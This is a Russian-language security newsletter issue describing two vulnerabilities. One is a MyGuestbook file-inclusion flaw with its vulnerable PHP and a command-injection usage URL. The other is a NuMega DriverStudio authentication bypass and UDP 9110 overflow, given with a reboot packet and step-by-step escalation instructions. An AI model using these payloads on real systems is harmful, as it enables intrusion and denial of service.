Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпуск по безопасности.


Информационный Канал Subscribe.Ru

Опасные продукты:
MyGuestbook
NuMega.DriverStudio
Безопансность
Продукт: MyGuestbook

Версия: 0.6.1

Уязвимый код в form.inc.php3:
if ($show < 1) {
include ("form.inc.php3");
}

Использование:
http://server/Guestbook/form.inc.ph...cmd.gif?&cmd=id
NuMega.DriverStudio

Версия: 2.7, 3.0beta2

Описание:
SoftICE Driver Suite - это очень популярное программное обеспечение для откладки ядра, по умолчанию DriverStudio Remote Control сервис (имя процесса:DSRsvc.exe) всегда используется для удаленной настройки. Авторизации происходит при сверке имени пользователя и пароле, но авторизацию можно обойти, что позволит любому удаленному атакующему изменить локальный файл настроек SoftIce'а (файл winice.dat).
Детали:
Remote-control communications использует DEC RPC протокол. Для авторизации используется протокол NTLM v1, если авторизация идет через NULL Session Login (NULL имя пользователя, NULL NTLM хеши), мы можем также изменить "winice.dat". При этом обычное закрытие окон NULL Session Login не бывает эффективно!
Другая уязвимость - любой может вызвать переполнение буфера через UPD 9110, что приводит к перезапуску системы.
02 00 00 00 41 41 41 00 ;00000002 --->команда перезагрузки
Используя эти две уязвимости мы можем поднять свои привилегии.
Использование:
1. Изменяем winice.dat(используя modifit_config.cpp отправляем winice_attack.dat к цели)
2. Изменяем SoftIce'овый boot-type на Automatic.
3. Отправляем переполнение буфера обмена на UOD 9110, и ждем пока компьютер перезагрузится(используем send_reboot.cpp)
4. Отправляем шелл-код на UPD 9110(используем send_shellcode.cpp)
Если Вам нравится эта рассылка и Вы пользуетесь сведениями из неё, то можете поддержать автора, перечислив небольшое вознаграждение на R474348938531 или Z451490294903. Связаться со мной можно по ICQ 273214003.

Subscribe.Ru
Поддержка подписчиков
Другие рассылки этой тематики
Другие рассылки этого автора
Подписан адрес:
Код этой рассылки: comp.paper.supuser
Архив рассылки
Отписаться
Вспомнить пароль

В избранное